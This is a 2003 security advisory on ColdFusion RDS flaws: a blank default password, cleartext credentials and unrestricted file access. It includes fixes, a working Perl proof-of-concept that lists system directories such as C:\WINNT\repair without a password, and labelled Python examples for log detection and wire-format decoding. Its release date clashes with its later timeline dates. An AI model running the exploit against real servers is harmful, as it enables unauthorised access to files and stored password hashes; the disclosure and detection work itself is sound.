ColdFusion Server 4.5, 5 and MX suffer from multiple vulnerabilities in the Remote Development Service (RDS). They range from the RDS password being blank by default, and being sent in clear text when it is set, to a normal remote user being able to reconfigure their website properties to put and get any file on the server.
- -- ------------------------- -- -
[>(] AngryPacket Security Advisory [>(]
- -- ------------------------- -- -
+--------------------- -- -
+ advisory information
+------------------ -- -
Exploit Code: Victim1 <victim1@angrypacket.com>
Initial Bug Report By: rs2112 <rs2112@hushmail.com>
release date: 06/26/2003
+------------------- -- -
+ timeline of Vendor Notification
+------------------- -- -
1: Initial email - Remote RDS problem and sample runtime exploit code
-> Sun Jun 29 18:30:21 CDT 2003
1a: Status: (Mon) No response
2: Call Macromedia - Get treated like a peckerhead and no one cares.
-> Monday 4:00 pm Cali time -> Email: PR -> 4:30 pm Cali time.
2a: Next day (Tues): No one responds. Oh well, post code.
+-------------------- -- -
+ product information
+----------------- -- -
software: Cold Fusion server
vendor: Macromedia
homepage: https://www.macromedia.com
description:
With ColdFusion MX, you can build and deploy powerful web applications and web
services with far less training time and fewer lines of code than ASP, PHP, and
JSP. Now available in versions that support industry leading J2EE application
servers, ColdFusion MX enables web application developers to easily harness the
power of the Java platform.
+---------------------- -- -
+ vulnerability details
+------------------- -- -
problem 1: RDS runs with the authority of the CF service account (LocalSystem by default), so an RDS user can read, write and retrieve any file on the server.
problem 2: Default Remote Development Service (RDS) configuration: no password (blank) is required to authenticate.
problem 3: When an RDS password is set, it is sent over the wire in clear text.
problem 4: The ASP session ID cookie sent with RDS requests is not validated.
affected: ColdFusion Server 4.5, 5 and MX (the RDS service on 4.5/5, the RDS servlet on MX; the exploit below emulates the MX exchange)
explanation: ColdFusion RDS allows developers to access remote files
and data sources, and debug CFML code. Developers can use RDS through
ColdFusion Studio, HomeSite+, and Dreamweaver MX to access files and databases
on a remote ColdFusion development server over HTTP. Under CF 4.5/5, RDS ran
as a service; under CFMX, RDS is a Java servlet that runs under the context of
the CF Application service account. In both cases, by default, RDS has
LocalSystem authority to the box. When properly configured, RDS requires a
(static) password to authenticate the remote developer. The first
vulnerability (1) is that, because of this level of access, a remote user can
reconfigure their website properties to access (put and get) any file on the CF
server, not just files under the web root. The second vulnerability (2) is
that, by default, RDS does not require a password for authentication (null
password). Therefore anyone with an RDS-compatible development application can
attach to a CF server running RDS, authenticate with a blank password, and own
the box. The third vulnerability (3) is that when the RDS password is set, it is
sent over the wire in clear text, so anyone able to observe the HTTP traffic
between developer and server can recover it. A fourth observation (4) is that
the ASP session ID cookie sent with each RDS request is never validated; it can
be changed on the fly and plays no part in authentication (see the comments in
the exploit below).
risk: High
status: Awaiting vendor response. (Read timeline above.)
exploit: As a proof of concept, victim1 has developed beta code that can
be used to exploit the RDS blank-password vulnerability. The code
demonstrates that it would be a trivial task to scan the Internet,
determine which servers are running CF, and compromise the box.
fix: Vulnerability 1 - run ColdFusion (and therefore RDS) under a dedicated service account with restricted access to the server, not LocalSystem.
Vulnerability 2 - set the d*mn password.
Vulnerability 3 - do not expose RDS over plain HTTP where the traffic can be observed; put it behind TLS or restrict it to trusted developer hosts, and disable RDS entirely on servers that do not need it.
Vulnerability 4 - ASP session ID not validated: no fix from the vendor; do not rely on that cookie for anything.
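A detection check to go with the fixes, as an added example that is not part of the advisory: the proof-of-concept below sends POST requests to /CFIDE/main/ide.cfm?CFSRV=IDE with the User-Agent Dreamweaver-RDS-SCM1.00, and all of that lands in the IIS log of the server in front of ColdFusion. The script parses an IIS W3C extended log and flags every hit on the RDS endpoint, ranking sources outside a trusted developer network first. The log lines, the field list and the trusted network are constructed for the example.

```python
from __future__ import annotations

import ipaddress

RDS_ENDPOINT = "/cfide/main/ide.cfm"   # RDS servlet path used by the advisory's script
RDS_UA = "Dreamweaver-RDS-SCM1.00"     # user agent the script sends

# Assumption for this example: only this network is allowed to talk RDS.
TRUSTED_DEV_NETS = [ipaddress.ip_network("10.10.0.0/24")]

# Constructed IIS W3C extended log excerpt (not from the advisory).
# IIS writes '-' for an empty field and '+' for spaces inside a field.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2003-07-01 10:30:43 203.0.113.7 POST /CFIDE/main/ide.cfm CFSRV=IDE&ACTION=BrowseDir_Studio 200 Dreamweaver-RDS-SCM1.00
2003-07-01 10:31:02 10.10.0.15 POST /CFIDE/main/ide.cfm CFSRV=IDE&ACTION=BrowseDir_Studio 200 Dreamweaver-RDS-SCM1.00
2003-07-01 10:31:40 203.0.113.7 GET /index.cfm - 200 Mozilla/4.0+(compatible;+MSIE+6.0)
2003-07-01 10:32:11 198.51.100.9 POST /cfide/main/ide.cfm CFSRV=IDE&ACTION=BrowseDir_Studio 200 Mozilla/4.0+(compatible;+MSIE+6.0)
"""


def parse_w3c(text: str) -> list[dict]:
    """Return one dict per request line, keyed by the names in the #Fields directive."""
    fields = None
    records = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("log line before #Fields directive")
        values = line.split(" ")
        if len(values) != len(fields):
            raise ValueError(f"expected {len(fields)} fields, got {len(values)}: {line}")
        records.append(dict(zip(fields, values)))
    return records


def is_trusted(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in TRUSTED_DEV_NETS)


def find_rds(records: list[dict]) -> list[dict]:
    """One finding per hit on the RDS endpoint, untrusted sources first."""
    findings = []
    for r in records:
        params = dict(p.split("=", 1) for p in r.get("cs-uri-query", "-").split("&") if "=" in p)
        # Key on the endpoint and the CFSRV parameter, not on the user agent:
        # the UA string is trivially forged, so it is only reported, not relied on.
        if r.get("cs-uri-stem", "").lower() != RDS_ENDPOINT and params.get("CFSRV", "").upper() != "IDE":
            continue
        findings.append({
            "when": f"{r['date']} {r['time']}",
            "source": r["c-ip"],
            "trusted": is_trusted(r["c-ip"]),
            "status": int(r["sc-status"]),
            "rds_client_ua": r.get("cs(User-Agent)") == RDS_UA,
            "action": params.get("ACTION", "-"),
        })
    findings.sort(key=lambda f: (f["trusted"], f["when"]))
    return findings


if __name__ == "__main__":
    for f in find_rds(parse_w3c(SAMPLE_LOG)):
        level = "info " if f["trusted"] else "ALERT"
        print(f"{level} {f['when']} {f['source']:<15} {f['action']:<18} HTTP {f['status']} rds-ua={f['rds_client_ua']}")
```

A 200 on this endpoint from an address that is not a developer workstation is the thing to chase, whatever the User-Agent says; the RDS endpoint itself, not the client string, is the reliable indicator.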
+-------- -- -
+ credits
+----- -- -
Vulnerability reported by rs2112.
Exploit code developed by Victim1 of AngryPacket Security group.
+--------------
+ exploit:
+-------------
#!/usr/bin/perl
# RDS_c_Dump.pl
# victim1@angrypacket.com
## BIG NOTE -> aka ( DISCLAIMER ): if you do something retarded with this code or a modification of this code you are completely on your OWN.
# Neither I nor rs2112 take any responsibility for your stupid actions, LET IT BE KNOWN! This is meant for administrators to protect themselves against
# attack and that's it.
## CF 6 MX Server does several things in order to get a remote dir structure, so we will need
# to recreate these functions. This is an "almost" complete emulation of a Dreamweaver client connection, just FYI,
# in what amounts to one full HTTP/1.1 session within netcat.
#
# I would like to point out that the ASPSESSID is never validated, so you can change this on the fly.
#
# Also I would like to say Macromedia's phone support sucks ass. I called trying to be a nice guy (to follow up on email) and
# they attempted to belittle my intelligence on the phone.. . Oh, and yes, I did email them several times with no response.
#
# You can write as well; I have tested it and this works fine. If you change the file to an *.exe it will attempt to become a
# 16-bit DOS application on the remote box, FYI.
#
# Requests are sent in this order to get a remote dir structure:
# NOTE: Create dir retrieval array.
#
# ANOTHER NOTE:
# Due to certain current situations I am not allowed to release full exploit code with (READ, RETRIEVE, WRITE) functions. I have fully working code;
# if you email me I will not send it to you, so basically don't bother.
#
# I'm sorry for being such a foil fart but hey, you understand, I'm sure.
# Sample output:
# --------------------------------
# Vic7im1@cipher:~/Scripts/RDS_Sploit$ perl RDS_c_Dump.pl
#
# POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1
#
# Request String Value: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0:
# Content-Length: 37
# Please wait.. ..
# HTTP/1.1 100 Continue
# Server: Microsoft-IIS/5.0
# Date: Tue, 01 Jul 2003 10:30:43 GMT
#
# HTTP/1.1 200 OK
# Server: Microsoft-IIS/5.0
# Date: Tue, 01 Jul 2003 10:30:43 GMT
# Connection: close
# Content-Type: text/html
#
# 50:2:F:11:autoexec.nt1:63:4383:0,02:F:9:config.nt1:64:25773:0,02:F:7:default1:66:1187843:0,02:F:10:ntuser.dat1:66:1187843:0,02:F:3:
# sam1:65:204803:0,02:F:12:secsetup.inf1:66:5735303:0,02:F:8:security1:65:286723:0,02:F:9:setup.log1:66:1551943:0,02:F:8:
# software1:67:65331203:0,02:F:6:system1:66:9748483:0,0
# Vic7im1@cipher:~/Scripts/RDS_Sploit$
# ----------------------------------
use strict;
use warnings;
use IO::Socket::INET;
## Dreamweaver string requests to ide.cfm
## --------------------------------------
## Framing: "<argc>:" followed by one "STR:<len>:<value>" per argument.
## The Content-Length of each POST is the byte length of that string, so it is
## computed below instead of being kept in a second, hand-maintained table.
#1: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#2: 3:STR:7:C:/_mm/STR:1:*STR:0: Content-Length: 28
#3: 3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0: Content-Length: 47
#4: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#5: 3:STR:10:C:/_notes/STR:1:*STR:0: Content-Length: 32
#6: 5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0: Content-Length: 50
#7: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#8: 5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0: Content-Length: 51
#9: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#10: 3:STR:3:C:/STR:1:*STR:0: Content-Length: 24
#11: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#12: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0: Content-Length: 53
#13: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#14: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0: Content-Length: 53
#15: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#16: 5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0: Content-Length: 51
#17: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#18: 3:STR:8:C:/WINNTSTR:1:*STR:0: Content-Length: 29 (the original listing had a stray "STR*" here; 29 bytes matches this string)
#19: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#20: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0: Content-Length: 37
# If you plan on listing something other than C:\WINNT\repair, change the path in the
# last request and its STR length (15 here) to match; the Content-Length follows from it.
# Requests 5 and 6 (C:/_notes) are left out of the run, as in the original.
my @rarray = (
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    "3:STR:7:C:/_mm/STR:1:*STR:0:",
    "3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0:",
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    #"3:STR:10:C:/_notes/STR:1:*STR:0:",
    #"5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0:",
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    "5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0:",
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    "3:STR:3:C:/STR:1:*STR:0:",
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    "5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    "5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    "5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0:",
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    "3:STR:8:C:/WINNTSTR:1:*STR:0:",
    "3:STR:15:C:/WINNT/repairSTR:1:*STR:0:"
);
system("clear");
# change target address below.
my $TARGET = "192.168.0.100";
my $PORT   = 80;
my $POST   = "POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1\r\n";
print "Generating Socket with Array Directory Values.\n";
# one POST per request string, in the order Dreamweaver sends them
foreach my $request (@rarray) {
    gen_sock($TARGET, $PORT, $request, "Content-Length: " . length($request));
}
# Open a fresh connection, send one RDS request the way the Dreamweaver client
# does, and echo the response. No RDS password is sent at all: a server still on
# the default (blank) password answers anyway.
sub gen_sock {
    my ($target, $port, $request, $clength) = @_;
    my $sock = IO::Socket::INET->new(
        PeerAddr => $target,
        PeerPort => $port,
        Proto    => 'tcp',
    ) or die "Socket could not be established! $@";
    print "Target: $target:$port\n";
    print "$POST\n";
    print "Request String Value: $request\n";
    print "$clength\n";
    print "Please wait.. ..\n";
    print $sock $POST;
    print $sock "Content-Type: application/x-ColdFusionIDE\r\n";
    print $sock "User-Agent: Dreamweaver-RDS-SCM1.00\r\n";
    print $sock "Host: $target\r\n";
    print $sock "$clength\r\n";
    print $sock "Connection: Keep-Alive\r\n";
    print $sock "Cache-Control: no-cache\r\n";
    # the ASP session cookie is never validated by the server; any value works
    print $sock "Cookie: ASPSESSIONIDQQQQGLDK=LPIHIKCAECKACDGPJCOLOAOJ\r\n";
    print $sock "\r\n";
    print $sock $request;
    # print the response (headers plus the "len:value" listing) to the terminal;
    # the server answers with "Connection: close", so read until EOF
    while (my $response = <$sock>) {
        chomp $response;
        print "$response\n";
    }
    close $sock;
}
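The request strings and the sample directory listing in the script above share one wire framing, and the following is an added example, not part of the advisory or its Perl code, that encodes and decodes it in Python. The structure is inferred from the captured data: a request body is "<argc>:" followed by "STR:<len>:<value>" per argument, and a BrowseDir_Studio response is "<count>:" followed by "<len>:<value>" fields, five per directory entry (kind, name, an attribute field, size, a date-like field). The meaning of the third and fifth field is not established here and they are kept raw; treating "D" as the directory kind is an assumption. One caveat the decoder surfaces: request 3 in the captured sequence declares 3 arguments but carries 5 STR fields, and the decoder reports that mismatch rather than guessing.

```python
from __future__ import annotations

# Added example (not the advisory's code): encoder/decoder for the RDS framing
# seen in the Perl script above. Field meanings beyond kind/name/size are an
# assumption and are passed through untouched.


def rds_encode(*args: str) -> str:
    """Build an RDS request body; its HTTP Content-Length is len(result)."""
    return f"{len(args)}:" + "".join(f"STR:{len(a)}:{a}" for a in args)


def rds_fields(payload: str) -> list[str]:
    """Split a counted '<len>:<value>' stream into values, checking the framing.

    Fields may carry the 'STR:' prefix used in requests. A count that does not
    match the bytes present raises ValueError instead of silently guessing.
    """
    count, sep, rest = payload.partition(":")
    if not sep or not count.isdigit():
        raise ValueError("missing field count")
    values, pos = [], 0
    for _ in range(int(count)):
        if rest.startswith("STR:", pos):
            pos += 4
        colon = rest.find(":", pos)
        if colon < 0 or not rest[pos:colon].isdigit():
            raise ValueError(f"bad length at offset {pos}")
        length, start = int(rest[pos:colon]), colon + 1
        value = rest[start:start + length]
        if len(value) != length:
            raise ValueError(f"field truncated at offset {start}")
        values.append(value)
        pos = start + length
    if pos != len(rest):
        raise ValueError(f"{len(rest) - pos} trailing bytes after {count} fields")
    return values


def is_well_formed(payload: str) -> bool:
    """True when the declared count matches the bytes present."""
    try:
        rds_fields(payload)
        return True
    except ValueError:
        return False


def rds_listing(payload: str) -> list[dict]:
    """Decode a BrowseDir_Studio response into one dict per entry."""
    fields = rds_fields(payload)
    if len(fields) % 5:
        raise ValueError("listing is not a whole number of 5-field entries")
    entries = []
    for kind, name, attr, size, stamp in zip(*[iter(fields)] * 5):
        entries.append({
            "kind": kind.rstrip(":"),  # files carry "F:" in the capture; "D" for directories is assumed
            "name": name,
            "attr": attr,              # meaning not established; kept raw
            "size": int(size),
            "stamp": stamp,            # meaning not established; kept raw
        })
    return entries


# Directory listing of C:\WINNT\repair as captured in the advisory's sample output.
SAMPLE_LISTING = (
    "50:2:F:11:autoexec.nt1:63:4383:0,02:F:9:config.nt1:64:25773:0,02:F:7:default1:66:1187843:0,02:F:10:ntuser.dat1:66:1187843:0,02:F:3:"
    "sam1:65:204803:0,02:F:12:secsetup.inf1:66:5735303:0,02:F:8:security1:65:286723:0,02:F:9:setup.log1:66:1551943:0,02:F:8:"
    "software1:67:65331203:0,02:F:6:system1:66:9748483:0,0"
)

if __name__ == "__main__":
    body = rds_encode("C:/WINNT/repair", "*", "")
    print(body, "Content-Length:", len(body))
    for e in rds_listing(SAMPLE_LISTING):
        print(f"{e['kind']} {e['name']:<14} {e['size']:>9} attr={e['attr']} stamp={e['stamp']}")
```

Running it reproduces request 20 of the script with Content-Length 37 and turns the captured blob into ten named entries with their sizes (for example sam at 20480 bytes), which is what an administrator wants to see when confirming that an unauthenticated RDS call really returned a listing of a system directory.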
+----------- -- -
+ disclaimer
+-------- -- -
READ IN THE SCRIPT.
Oh and Happy 4th of July !
- -- -------------------------
#EOT